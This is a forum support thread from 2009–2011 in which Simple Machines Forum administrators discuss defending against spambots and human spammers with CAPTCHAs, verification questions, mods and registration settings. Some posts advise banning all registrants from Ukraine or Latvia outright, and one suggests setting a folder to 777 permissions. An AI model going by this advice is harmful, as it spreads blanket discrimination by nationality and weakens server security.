Oh by the way, I've got a fetching little avatar wearing a shapka (Russian winter hat); how do upload one for the forum?

I don't quite get that question

I think he was being sarcastic. Presumably he doesn't really have an avatar with hidden code :). It wouldn't work on this forum, but would on any unpatched one.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: coledavis on May 23, 2009, 02:06:57 PM
Quote from: MrPhil on May 23, 2009, 01:40:50 PM
Quote from: akyhne on May 23, 2009, 09:28:19 AM
Quote from: coledavis on May 23, 2009, 09:13:12 AM
Oh by the way, I've got a fetching little avatar wearing a shapka (Russian winter hat); how do upload one for the forum?

I don't quite get that question

I think he was being sarcastic. Presumably he doesn't really have an avatar with hidden code :). It wouldn't work on this forum, but would on any unpatched one.

No, I wasn't being sarcastic. I do have a nice avatar but couldn't work out how to put it onto th e forum (as I note other people have avatars on it). Your comment about hidden code is just the sort of prejudice that my previous email was about. Nope, it's just an avatar. As for illegitimate emails coming from mail.ru, please note that most Russians have this email address, which is as common as hotmail or gmail.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: coledavis on May 23, 2009, 02:09:21 PM
Back to the main point of the thread. I've converted to 1.1.9 (like a good Russian resident) and am still getting spam. I've looked at the various packages intended to deal with spam and none of them are explicitly marked as compatible with this edition of SMF. Can anyone comment as to one which should work well with 1.1.9?
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: WIZARD87 on May 23, 2009, 02:28:11 PM
Quote from: coledavis on May 23, 2009, 02:09:21 PM
Back to the main point of the thread. I've converted to 1.1.9 (like a good Russian resident) and am still getting spam. I've looked at the various packages intended to deal with spam and none of them are explicitly marked as compatible with this edition of SMF. Can anyone comment as to one which should work well with 1.1.9?

I am using this one with great success highly recommend.
http://custom.simplemachines.org/mods/index.php?mod=1547 (http://custom.simplemachines.org/mods/index.php?mod=1547)
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Akyhne on May 23, 2009, 02:38:47 PM
This mod (http://www.simplemachines.org/community/index.php?topic=280188.0) is absolutely unsupported as it is not an official mod. But I'm having it installed in ~10 forums with great success.

It automatically bans spammers for the amount of hours you set it to. It even sends you an email if you want it.

[UNSUPPORTED] - USE ON OWN RISC!!!
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: 青山 素子 on May 23, 2009, 02:46:18 PM
Quote from: coledavis on May 23, 2009, 02:09:21 PM
I've looked at the various packages intended to deal with spam and none of them are explicitly marked as compatible with this edition of SMF. Can anyone comment as to one which should work well with 1.1.9?

Any modifications that are compatible with 1.1.3 or higher should work with 1.1.9 with no issues.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: HEB XI 1 on May 24, 2009, 08:40:36 AM
Just an FYI ... I had not gotten any spam registrations for several weeks and now in the last couple of days have gotten 5 or 6.  Looks like another round may be starting?

I did just upgrade to 1.1.9 - maybe they're testing the holes on the new version.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: coledavis on May 24, 2009, 11:28:40 AM
thanks everybody. with love from naughty old Russia.  :D
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: coledavis on May 25, 2009, 10:44:04 AM
Quote from: WIZARD87 on May 23, 2009, 02:28:11 PM
Quote from: coledavis on May 23, 2009, 02:09:21 PM
Back to the main point of the thread. I've converted to 1.1.9 (like a good Russian resident) and am still getting spam. I've looked at the various packages intended to deal with spam and none of them are explicitly marked as compatible with this edition of SMF. Can anyone comment as to one which should work well with 1.1.9?

I am using this one with great success highly recommend.
http://custom.simplemachines.org/mods/index.php?mod=1547 (http://custom.simplemachines.org/mods/index.php?mod=1547)
I'm having trouble installing this. I've got it there on 'browse packages' but every time I press 'apply mod', I get an apply mod 'Installation Readme' page up. It is unclear what I have to do now.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Akyhne on May 25, 2009, 10:46:48 AM
Please ask your question here: http://www.simplemachines.org/community/index.php?topic=283309.0
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: noelchiew on May 26, 2009, 03:23:38 AM
Recently I have been getting spam registrations who post replies in random topics with a signature linking to various websites selling stuff. The IPs are all traced from Philippines and they are all using either gmail or yahoo in emails. I have recapcha and doesn't seem to be stopping them, I've no idea if they are bots or humans.

Anyone affected by these spammers? How can I block them... not all are having the same IPs if not that would have made it much easier.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Aleksi "Lex" Kilpinen on May 26, 2009, 05:36:42 AM
I've seen those too... and I have a strong feeling that they are actually human, and that's why many anti-bot and anti-spammer measures seem to fail...
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: 青山 素子 on May 26, 2009, 01:48:00 PM
Quote from: noelchiew on May 26, 2009, 03:23:38 AM
I have recapcha and doesn't seem to be stopping them, I've no idea if they are bots or humans.

Very likely to be human. We've noticed a huge increase in human-backed spamming in the recent months.


Quote from: noelchiew on May 26, 2009, 03:23:38 AM
How can I block them... not all are having the same IPs if not that would have made it much easier.

You could try some different anti-spammer protection. Enable verification on the first 10 or so posts of a new member to slow things down. Try using other options like verification questions. The more unique you can make your registration and posting process, the more expensive it becomes to target you.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: noelchiew on May 26, 2009, 01:59:06 PM
Alright, we have dealt with bots and now we have human spammers sigh...

Thanks for your advice :)
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: clashbot on June 02, 2009, 04:01:31 PM
I am running 1.1.9 and using akyhne's avatar verification as well as the anti-bot verification. Between these two, I have noticed a lot of hits, but nothing getting through. Granted my two forums are specialist style forums(game related) so the anti-spam questions are based on those games, still simple questions, but will stop anyone not prepared for a specialist style board. I use akyhne's mod to create the automatic ban triggers. Both work well together and both work well. knock on prefabricated, post recycled particle board made to look like real wood
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: coledavis on June 07, 2009, 09:27:29 AM
I've taken up the Stop Spammer mod. It is very effective.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Clara Listensprechen on July 06, 2009, 12:08:56 PM
Quote from: noelchiew on May 26, 2009, 01:59:06 PM
Alright, we have dealt with bots and now we have human spammers sigh...

Thanks for your advice :)
It's been my experience that they initially start out as human registrants, but thereafter automate their attacks.

In reviewing Forum Error messages, after making changes to board access per forum section, I've noticed error messages indicating that there are repeated attacks on forum sections that I've since closed access to, and they keep trying to access the same forum section repeatedly, long after closure.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Supermobilegame on July 19, 2009, 12:03:48 PM
I think its more powerfull if we combine 2 image verification (reCAPTCHA for SMF (http://custom.simplemachines.org/mods/index.php?mod=1044) + Anti Bot: Captcha Clock (http://custom.simplemachines.org/mods/index.php?mod=1134)).
With this we can stop bot from registering in our forum.  ;D
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: babjusi on July 19, 2009, 12:09:02 PM
Quote from: Supermobilegame on July 19, 2009, 12:03:48 PM
I think its more powerfull if we combine 2 image verification (reCAPTCHA for SMF (http://custom.simplemachines.org/mods/index.php?mod=1044) + Anti Bot: Captcha Clock (http://custom.simplemachines.org/mods/index.php?mod=1134)).
With this we can stop bot from registering in our forum.  ;D

the thing is that that won''t stop the human spammers though.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Clara Listensprechen on July 19, 2009, 02:57:54 PM
Quote from: babjusi on July 19, 2009, 12:09:02 PM
Quote from: Supermobilegame on July 19, 2009, 12:03:48 PM
I think its more powerfull if we combine 2 image verification (reCAPTCHA for SMF (http://custom.simplemachines.org/mods/index.php?mod=1044) + Anti Bot: Captcha Clock (http://custom.simplemachines.org/mods/index.php?mod=1134)).
With this we can stop bot from registering in our forum.  ;D

the thing is that that won''t stop the human spammers though.
True, at least in my case. I've seen it happen that actual humans use actual search engines to come up with a list of boards with apparent vulnerabilities, then register in person.  It's after that, that they automate attacks.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: gregh on August 11, 2009, 05:44:49 PM
I've just about given up trying to stop all spammers, but this mod at least negates any links/images they post....

http://www.simplemachines.org/community/index.php?topic=323605.0

cheers,

greg
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Yigal on August 11, 2009, 07:05:10 PM
Glad you could find a way out of Spammers :)
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Daveyo on September 20, 2009, 07:15:22 PM
Well attention members:

I also have been getting hit with smut and spam senders, but I set up a trap for them. 

First of all all admins must change from Automatic registry to manual approval.  You must check every IP so given.  Keep any IP from Ukranine, Latvia region out especially.

Ok here is the next thing:  Then protect your entire forum by denying any guest from entering a post to your main forum.

Here is the trap one.

Set up a guest forum only.  Here guests can make posts. 

What happens is when either a human spammer comes to your site or a spam bot wants to dump the trash to your site, they go to the guest side and pow here is where they dump it.

Easy for you.  Now when it comes in, do the ban IP both ways from the SMF and also your panel.

Here is the point.  If you close out your guests from making posts what happens is these spammers and smut senders will then make the attempts to register to your forum and once in they set up the damage machine to destroy your site and this can get really messy indeed.

When these people register you have no way of knowing who is a spammer or smut sender, so don't close out your site to guests.

Keep the guests open for these spammers and smut senders.  They also tend to do this in certain hours and you pretty much know when they do send them.

The real people will register and always check the IP and e-mails.  Double check everything before approving such.  If you so much as see one red dot on the IP check list, deny that registrants entry.

Now you might come across somebody from Ukraine or Latvia that wants to register.  DENY THEM with absolutely no question in your mind.   DENY THEM.  The vast majority of the spams and smuts come from this region and area location.

After such is approved, then make sure you install the are you human and do the captcha effects minimum of 10 times.  This way you will know if they are for real or some smut senders, as you can tell from the post. 

The other tip make sure the user names are limited in length.  Max to 6- 8 letters.  Spammers and smut senders tend to have big user names.

Last of all to all admins  >

MONITOR your site at least 4 times a day.  Spend time on your site and variate it especially.  This also discourages spammers and smut senders of figuring out when your in or out.  Admins you can also hide yourself and do it in cloak form too.

Admins then keep an eye on the guest spot.  As soon as you see someone about to post to the guest side, let them do it.  When they are done posting then take a look and when you see the spam and smut,  jot down everything , the name, the IP and do a search of location on IP.  Then do the removal of the post, then ban on SMF and then ban from your panel.  Then make a private ban list data and record all the info and your done.

What happens is these spammer and smut senders are happy they made a post.  Unknown to them it was already removed and they are banned on their next appearance.

I have not seen any of them try to get back since.

Anyway it is just an idea of a way to set up a trap for the spammers and smut senders which basically keeps them out of your main site itself and you have it protected by allowing them to post on the guest side.  Unknown to them that is your recycle bin!!!!!  hehehehehehe.

Daveyo


Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Arantor on September 20, 2009, 07:22:45 PM
I would argue that those tips are a little bit much for most forums; particularly on busy forums.

There are also several anti-spam mods that are quite effective.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Akyhne on September 20, 2009, 08:55:15 PM
I have my own personal sequrity mod installed in my largest forum. I never saw the shadow of a spammer there, as they can't even get to the registration page XD. And all it really takes to get there, is a single click with the mouse.

That's the benefit of having your own personal spam protection ;)
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: TheDragon on September 24, 2009, 10:16:24 AM
Quote from: Akyhne on September 20, 2009, 08:55:15 PM
I have my own personal sequrity mod installed in my largest forum. I never saw the shadow of a spammer there, as they can't even get to the registration page XD. And all it really takes to get there, is a single click with the mouse.

That's the benefit of having your own personal spam protection ;)

so , , , you gonna share your coding?  ::)
or at least idea? perhaps edit the link from the register page to an interim page?
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Akyhne on September 24, 2009, 10:46:35 AM
It's already here as a package somewhere in the "Coding Discussion" board. You can see and test it here: http://smf17-danish.e-debatten.dk/

EDIT: http://www.simplemachines.org/community/index.php?topic=280188.0

It will *not* work with the next release of SMF 2.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: ModelBoatMayhem on July 26, 2010, 08:53:06 AM
After the last month I've had hundreds of spammer account attempted to be created from *.info  email addresses, anybody else having the same thing?   >:(
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: IngeJones on July 26, 2010, 09:33:37 AM
Quote from: ModelBoatMayhem on July 26, 2010, 08:53:06 AM
After the last month I've had hundreds of spammer account attempted to be created from *.info  email addresses, anybody else having the same thing?   >:(

It's really annoying because I have a genuine .info domain and email address, and I am increasingly finding myself unable to register at places with it, as they probably have me spamlisted.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: kaamaru on July 27, 2010, 03:35:49 PM
I have lots of spammers who just put ads in their sigs and occasionally dvd converter spam.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: busterone on July 27, 2010, 05:06:21 PM
Quote from: Calumks on July 27, 2010, 03:35:49 PM
I have lots of spammers who just put ads in their sigs and occasionally dvd converter spam.
Easiest way to stop that is to not allow new users the ability to edit additional profile settings, which will prevent them from having a sig. Most of these type spammers will register, add a sig, post 2 or 3 times in a topic appearing to be on topic, then leave to never return. By preventing them from having a sig, they login and stay about 5 minutes, then leave for good.
I have mine set for under 10 posts- no ability to edit profile, but you can set it up any way you prefer.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: rd on July 27, 2010, 05:46:46 PM
I don't know if already mentioned but Custom Questions and reCAPTCHA helps a lot. Disallowing sigs can also help stop spam in your forum.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Midnitelove on July 29, 2010, 04:54:38 PM
Quote from: Royalduke on July 27, 2010, 05:46:46 PM
I don't know if already mentioned but Custom Questions and reCAPTCHA helps a lot. Disallowing sigs can also help stop spam in your forum.

How do I set this up? Also how do I set a min. post count before allowing siggys?
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: 青山 素子 on July 29, 2010, 05:21:21 PM
Quote from: Midnitelove on July 29, 2010, 04:54:38 PM
Quote from: Royalduke on July 27, 2010, 05:46:46 PM
I don't know if already mentioned but Custom Questions and reCAPTCHA helps a lot. Disallowing sigs can also help stop spam in your forum.

How do I set this up? Also how do I set a min. post count before allowing siggys?

For custom questions, it's a modification for the 1.1 series and built-in for 2.0 (look under anti-spam).

On signature permissions, it's not that granular. You will have to disable the entire "profile" section. First, enable permissions for postcount-based groups. Now, create a new postcount-based group with whatever name you want. Set the minimum postcount to the level at which you want users to have the ability to edit/create a signature. Edit the Newbie (0 posts) group and deny permission to edit the forum profile.

I think that will do it, but i haven't done such a thing in a long time and don't have a test board handy right now to check against.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: ModelBoatMayhem on June 11, 2011, 09:56:01 PM
Seems to have started again this weekend , so far 50 this weekend.  >:(
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: XJDenton on June 12, 2011, 08:47:31 AM
Same problem. Had about 80 registrations from bots in the last couple of days. Running 1.1.13.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: a10 on June 12, 2011, 09:39:09 AM
This seems to do the job (http://www.simplemachines.org/community/index.php?topic=436750.msg3065887#msg3065887) at least on my forum.

Am amazed the 16.000 lines htaccess (have added ro, lv, lt + a few more countries) does not seem to slow things down.  :D the satisfaction of not seeing a single cn, ru etc ip or any bot registration for a month now.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: MacGig on June 27, 2011, 05:03:20 PM
good tips. I finally gave up on version 1.1x... captcha has been broke a long time and no one is fixing it. mods are useless cause I'm not editing files...

just installed 2.0. so far so good... I removed all account with 0 posts.. 300 of them. why? bots join and never post. least thats what I have found.  if you have a small forum and want to check for bots use

http://botscout.com/search.htm

I agree on banning IPs or emails... I've tried all that. useless.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: 青山 素子 on June 27, 2011, 10:52:20 PM
Quote from: MacGig on June 27, 2011, 05:03:20 PM
good tips. I finally gave up on version 1.1x... captcha has been broke a long time and no one is fixing it. mods are useless cause I'm not editing files...

It can't be fixed because spam tools are now using services that utilize real humans to solve them. Unless you want to make it impossible for all humans to pass, it'll only stop the simple bots.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: MrMike on June 28, 2011, 08:59:07 AM
Quote from: 青山 素子 on June 27, 2011, 10:52:20 PM
It can't be fixed because spam tools are now using services that utilize real humans to solve them. Unless you want to make it impossible for all humans to pass, it'll only stop the simple bots.
Yep. There are now a lot of services in India and China that use teams of people to solve or fill in CAPTCHA codes. They'll do 1,000  of them for a few dollars.

Tools like XRumer and Scrapebox are still used a lot and (not surprisingly) the code seems to get more adept with every release. Between stuff like XRumer and the paid CAPTCHA teams it's more of a challenge to keep a forum clean.

I highly recommend the Avatar Verification mod package; it's one of the most effective CAPTCHAs I've seen. It won't stop humans but it'll put a dent in the automated registrations.

Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: JeeK on June 28, 2011, 10:29:39 AM
Quote from: 青山 素子 on June 27, 2011, 10:52:20 PM
Quote from: MacGig on June 27, 2011, 05:03:20 PM
good tips. I finally gave up on version 1.1x... captcha has been broke a long time and no one is fixing it. mods are useless cause I'm not editing files...

It can't be fixed because spam tools are now using services that utilize real humans to solve them. Unless you want to make it impossible for all humans to pass, it'll only stop the simple bots.

I see the registration attempts for several weeks - a real pain. First I thougth
the build in CAPTCHA has a weakness, but after changing to reCAPTCHA
(who will update the SMF-package to fit the URIs to the know "owner" Google?
BTW: I have to write my own language mod for this package because german is not supported)
they passing the verification process again.
Now I am certain about the mentioned fact that real humans are working behind the scenes.

So far I found a way to keep them away, because the tool they are using fills
formular values for checkboxes in a different way than common browsers do
(e.g. for the  checkbox named "skip_coppa" in the registration form).
But its only a matter of time when this is fixed by the spammers ...

JeeK
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: 青山 素子 on June 28, 2011, 11:18:47 AM
Quote from: MrMike on June 28, 2011, 08:59:07 AM
Tools like XRumer and Scrapebox are still used a lot and (not surprisingly) the code seems to get more adept with every release.

Those tools already integrate the services of companies that exist simply to solve CAPTCHAs.


Quote from: JeeK on June 28, 2011, 10:29:39 AM
(who will update the SMF-package to fit the URIs to the know "owner" Google?
BTW: I have to write my own language mod for this package because german is not supported)

I'm the maintainer of that modification, so I will be updating the remaining URLs soon. The latest release did update the recaptchalib.php file, which got the majority of them. Also, if you would like, you can send your translation by PM for inclusion in the package.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: MrMike on June 29, 2011, 01:51:00 AM
I highly recommend adding some time-gating to your registration form.  I use this technique on most of my contact and registration forms and it knocks out about 99.99% of all the crap and spambots, and that's without a captcha.

For a contact form, if I also disallow "http:" in the comment text it drops to about 99.999%.

I'm using some very simple time-gating on the GT5Cheats.com (http://gt5cheats.com/forum/) site as well as the GameThinker.com (http://gamethinker.com/) site (both SMF forums) and they each reject hundreds and hundreds of spam-bot attempts per day. The best part is that it almost never affects actual (real) users who are trying to register.

I'd be glad to contribute the code for this if someone would like to put it into a mod package. The code is very simple but extremely effective.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: MacGig on July 05, 2011, 03:17:53 PM
I had my first bot join today (I think)... just one so far since installing smf 2.0 seven days ago or so... the users IP was fine, but their email and user name came up in the bot list at http://botscout.com/search.htm

so I guess smf 2.0 is not bot proof after all? I really hoped it was... it was looking like it was since installing it... 

I don't understand how they get past the captcha? or the questions I created? how could a bot know what questions I am going to ask, let alone enter in the answer?

is it possible a human made the account and not the bot?

how can i get the bots to stop crawling my forum? would disabling guest access help? I mean if their nothing there for the bot to see perhaps over time it will go harass someone else's forum?
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: 青山 素子 on July 05, 2011, 04:15:59 PM
Quote from: MacGig on July 05, 2011, 03:17:53 PM
so I guess smf 2.0 is not bot proof after all? I really hoped it was... it was looking like it was since installing it... 

Nothing is. If a human can get in, a reasonably well-programmed bot can as well.


Quote from: MacGig on July 05, 2011, 03:17:53 PM
I don't understand how they get past the captcha? or the questions I created? how could a bot know what questions I am going to ask, let alone enter in the answer?

How general are the questions? Things like "What color is the sky?" and "2+2" are easily bypassed. Questions like "What is the name of the main character in Gungrave?" are not.

As for CAPTCHAs, they have been broken for years. The most popular software uses special services that employ humans (in low-income countries) to solve them.


Quote from: MacGig on July 05, 2011, 03:17:53 PM
is it possible a human made the account and not the bot?

Yes.


Quote from: MacGig on July 05, 2011, 03:17:53 PM
how can i get the bots to stop crawling my forum? would disabling guest access help? I mean if their nothing there for the bot to see perhaps over time it will go harass someone else's forum?

If you disable guest access, you'll drop out of search engines, so keep that in mind. However, it could reduce the volume of attempts. It won't stop them completely unless you also completely disable registration.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: MacGig on July 05, 2011, 04:28:17 PM
little disappointed. I thought smf 2 was finally the answer to a forum over run with bots for many many years....

I guess my questions are too easy?... "please enter the following word-"... all related to what the forum is about... some are a little more difficult... "please enter the first 4 letters of the following word", or "enter the last 5 letters of the following word"

Just one bot so far, so it's not too bad yet...  I may make the questions tougher... :)
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: fwitt on July 05, 2011, 04:43:14 PM
For my site I had a relatively easy job of picking questions that bots cant answer but thats because I all potential members of my forum are from members or family members of a youth group. So asking for the group colours is a question that they will easily be able to answer that is very difficult for a bot to answer.

However the other forums I admin on have a much harder time because they are open to a lot more people who may not even speak English.

smf arcade site is the worst out of the sites I admin. How do you set a question that someone using google translate can answer but a bot cant?
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: MrPhil on July 05, 2011, 10:07:47 PM
Well, I'll repeat what I've been saying for a long time. It is insufficient to have only a "hard crust" defense designed to stop bots from signing up. More and more, spammers are turning to farms of Third World people to do nothing but crack CAPTCHAs and answer "are you human" questions. Questions sufficiently narrow in scope to restrict correct replies to your intended audience may give false negatives due to ambiguity or multiple "right" answers. Besides, almost anything factual can be googled these days.

SMF is going to have to turn to monitoring post content to flag possible spams to be held for review. I discuss some of this in my sig > Projects. Spammer-like patterns of usage can be detected, such as exceeding 2 posts per day/7 posts per week for the first 30 days of an account. Suspicious posts can be held for review, or less suspicious ones can be challenged with a CAPTCHA and/or questions (like a registration). Not just for newbies: all posts are searched for excessive links, keywords, non-words (attempting to evade controls), and unquoted copying of earlier posts. And of course, no active links or sigs until a certain length of time and perhaps a certain number of posts.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Aleksi "Lex" Kilpinen on July 06, 2011, 12:11:07 AM
I would agree that most of that sounds like a good way to catch spammers - but posting activity?
I've had many members making around 10-20 posts a day from day one....
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: MacGig on July 06, 2011, 06:17:24 AM
almost all of the bots that join my forum never post. they just join.

my forum is about sports, football for example... why do people/bots/spammers go through so much trouble to hack into/join a forum then never post? I mean they can read the entire forum without joining. so whats the point? whats in it for them?

I dont' get it. Most are from china, russia, pakistan, japan, etc... a few from USA...
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: MrPhil on July 06, 2011, 09:28:32 AM
Quote from: Aleksi "Lex" Kilpinen on July 06, 2011, 12:11:07 AM
I've had many members making around 10-20 posts a day from day one....
A characteristic of spammers is to join, perhaps lay low for a while until they "age out" of any closely-watched newbie group (see post following yours), and then put out a burst of spam posts before they can be banished.

Personally, I've never seen anyone with something worthwhile saying, spewing out 10 to 20 posts per day from the get-go. Usually it's spammers going at that rate.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Aleksi "Lex" Kilpinen on July 06, 2011, 09:30:45 AM
Well, on my board it mostly seems people either join to post - or to lurk, and stick with their choice :P
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: MrMike on July 06, 2011, 11:44:25 AM
Quote from: MacGig on July 05, 2011, 04:28:17 PM
little disappointed. I thought smf 2 was finally the answer to a forum over run with bots for many many years....
There is no such thing, and there never will be. Any application that allows people to sign up to it will have to contend with bots and unwanted visitors in some fashion. CPATCHAs can help keep bots out, but nothing will keep a human out, since humans are supposed to be able to sign up.

In other worrds, stop looking for a 100% bullet-proof solution. It simply does not exist. The best you can do is add layers of protection to help screen them out and keep the numbers down.

I expect that many forums will go to "admin approval" only settings. Right now I do this, but in the registration page I instruct users to email us and tell us that they would like their account activated. Bots don't do that, and only a smattering of human spammers will bother. Between that and BotScout and CAPTCHAs, it's pretty well under control for me (and I run dozens of forums at the moment).
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: MacGig on July 06, 2011, 12:06:55 PM
yep guess my expectations were set a little too high. I may try your idea, admin approval and send an email... guess that works as well as anything else...

so far all of the mods i've seen for keeping out spammers are useless to me because I don't code. No sense in pretending I code, or even trying it. Waste of time for me trying to edit a half a dozen or more files.. Even installing mods via SMF don't seem to work like it should so forget that idea too.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: WillyP on July 06, 2011, 12:10:47 PM
Quote from: MacGig on July 05, 2011, 04:28:17 PM
little disappointed. I thought smf 2 was finally the answer to a forum over run with bots for many many years....

I guess my questions are too easy?... "please enter the following word-"... all related to what the forum is about... some are a little more difficult... "please enter the first 4 letters of the following word", or "enter the last 5 letters of the following word"

Just one bot so far, so it's not too bad yet...  I may make the questions tougher... :)

You have to keep in mind these questions are now being answered by humans, who get paid piecework, ie like $1 for 1000 solved. So ideally the question would be very specific to your target demographics, for example, 'What is the name of the main character of the game this forum is a fan of?'. Often a forum is more generalized, and you might want to include a question that requires the candidate to follow a link to a specific post and read a paragraph or two to get the answer. A support forum for software could have the answer in the software. Now, of course a human solver could solve this, but it just isn't worth their time, when they can easily just move on to the next url on the list. Whereas, a real member wants to join and would take the time to find the answer as long as it is not too difficult.

lol: I once tried to join a support forum and they had a math question I could not solve. Turns out who ever wrote the question had made a mistake. Make sure your question can be solved reasonably easy.

I have only once or twice had a problem installing a mod, it is not that difficult.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: vertese on July 08, 2011, 03:18:19 PM
I am feeling stuck, we are getting loads of spammers every day and have it set on member approval.
We are unable to update to 2.0 because we have Dilber MC Theme by HarzeM which we have heard is not compatable with 2.0
Please has anyone got any ideas on what we can do.
A good spam catcher that works with SMF 1.1.13 is what we need, please.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Midnight Caller on July 08, 2011, 03:41:17 PM
@vertese, Have you install the Mod Anti-Spam Verification Questions (http://custom.simplemachines.org/mods/index.php?mod=1516) ?
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: vertese on July 08, 2011, 03:47:45 PM
thank you for the reply. I did look at that before I posted but it said SMF 1.1.7
Will it be ok with ours?
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Midnight Caller on July 08, 2011, 04:47:58 PM
Yes it will work, I have SMF 1.1.13 with it and it has stopt the Comment Spammers
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: vertese on July 08, 2011, 05:09:16 PM
Midnight caller, help and thank you
it says this
3. Execute Modification ./Themes/default/Register.template.php Test failed
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Midnight Caller on July 08, 2011, 06:13:02 PM
@vertese, My friend Gordo installed it for me so I am not going to be much help with installing Anti-Spam Verification Questions Mod, But with that said here gos:

Go to:
Packages
>Options   
Cleanup Permissions
>All files are writable - selekt

Then Click "Change file permissions"

Hope that helps

If not try making a folder in "Packages" called "temp" set file permissions to 777

If that does not work I am sorry but I can not help you!

But some one will be along to help you!
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Illori on July 08, 2011, 08:58:18 PM
if you have other mods you may need to do a manual install of the mod Manual Installation of Mods (http://wiki.simplemachines.org/smf/Manual_installation_of_mods) you are best to post in the support thread for that mod.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: MrMike on July 08, 2011, 11:14:47 PM
Quote from: vertese on July 08, 2011, 03:18:19 PM
A good spam catcher that works with SMF 1.1.13 is what we need, please.
I recommend 2 things:

1) The Avatar Verification mod.
2) Add time-gating to your registration page.

Those two things will knock out a vast majority of the spambots. As for humans, there's not much you can do except insist they email you upon registration and request that their account be activated.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: Aleksi "Lex" Kilpinen on July 09, 2011, 12:25:32 AM
The verification questions can often help a lot.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: vertese on July 09, 2011, 12:12:29 PM
Midnight Caller and others
thank you so much, it has worked, and we have done it.
I am very, pleased. thank you.
Title: Re: Tidal wave of spambots attacks SMF 1.1.x - How to protect your forum
Post by: JeeK on July 10, 2011, 09:28:31 AM
Quote from: MrMike on July 08, 2011, 11:14:47 PM
Quote from: vertese on July 08, 2011, 03:18:19 PM
A good spam catcher that works with SMF 1.1.13 is what we need, please.
I recommend 2 things:

1) The Avatar Verification mod.
2) Add time-gating to your registration page.

Those two things will knock out a vast majority of the spambots. As for humans, there's not much you can do except insist they email you upon registration and request that their account be activated.

On my list I have some kind of browser gating too.
